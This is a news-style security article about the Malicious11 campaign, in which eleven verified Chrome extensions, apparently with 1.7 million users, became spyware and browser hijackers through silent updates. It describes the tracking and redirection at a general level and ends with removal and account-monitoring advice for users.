A sophisticated malware campaign has infiltrated over 1.7 million Chrome users through eleven seemingly legitimate browser extensions, all bearing Google’s verified badge and featured prominently on the Chrome Web Store. This Malicious11 campaign, uncovered by cybersecurity researchers at Koi Security, stands as one of the most extensive browser hijacking operations to date, exploiting the trust users place in verified extensions.
The Deceptive Facade
The malicious extensions posed as popular productivity and entertainment tools, spanning categories such as emoji keyboards, weather forecasts, video speed controllers, VPN proxies for Discord and TikTok, dark themes, volume boosters, and YouTube unblockers. Each extension functioned as advertised, delivering the promised features while covertly embedding surveillance and hijacking capabilities.
The investigation commenced with the analysis of Color Picker, Eyedropper — Geco colorpick, an extension boasting over 100,000 installs and more than 800 reviews. Despite its legitimate appearance and verified status, the extension was secretly commandeering users’ browsers, tracking every website visit, and maintaining a persistent command and control backdoor.
Notably, these extensions were not malicious from inception. They operated legitimately for years before becoming harmful through version updates. The codebase of each extension remained clean until the malware was introduced via automatic updates that silently installed for over 1.7 million users.
Due to how Google handles browser extension updates, these versions are auto-installed silently, the researchers noted. No phishing. No social engineering. Just trusted extensions with a quiet version bump.
Advanced Browser Hijacking Techniques
The malware employed a sophisticated browser hijacking mechanism that activated each time users navigated to a new page. Concealed within each extension’s background service worker was code that monitored all tab activity, capturing URLs and transmitting them to remote servers along with unique tracking identifiers.
This setup created a persistent man-in-the-middle capability that could be exploited at any moment. For instance, users clicking on Zoom meeting invitations could be redirected to counterfeit pages claiming the need to download critical updates, or banking sessions could be intercepted and redirected to exact replicas hosted on attackers’ servers.
Systemic Security Failures
The Malicious11 campaign exposes significant shortcomings in marketplace security. Google’s verification process failed to detect sophisticated malware across eleven different extensions, instead promoting several through verification badges and featured placement.
The attackers successfully exploited every trust signal users rely on—verification badges, install counts, featured placement, years of legitimate operation, and positive reviews.
Mitigation Measures
Users should immediately remove any affected extensions, clear browser data to eliminate stored tracking identifiers, run comprehensive system malware scans, and monitor accounts for suspicious activity.
This incident underscores the urgent need for enhanced marketplace security mechanisms as threat actors evolve beyond individual attacks to create comprehensive infrastructures that can remain dormant for years before activation.
This campaign represents a pivotal moment in browser extension security, demonstrating how the current marketplace security model is vulnerable to sophisticated, long-term infiltration strategies.
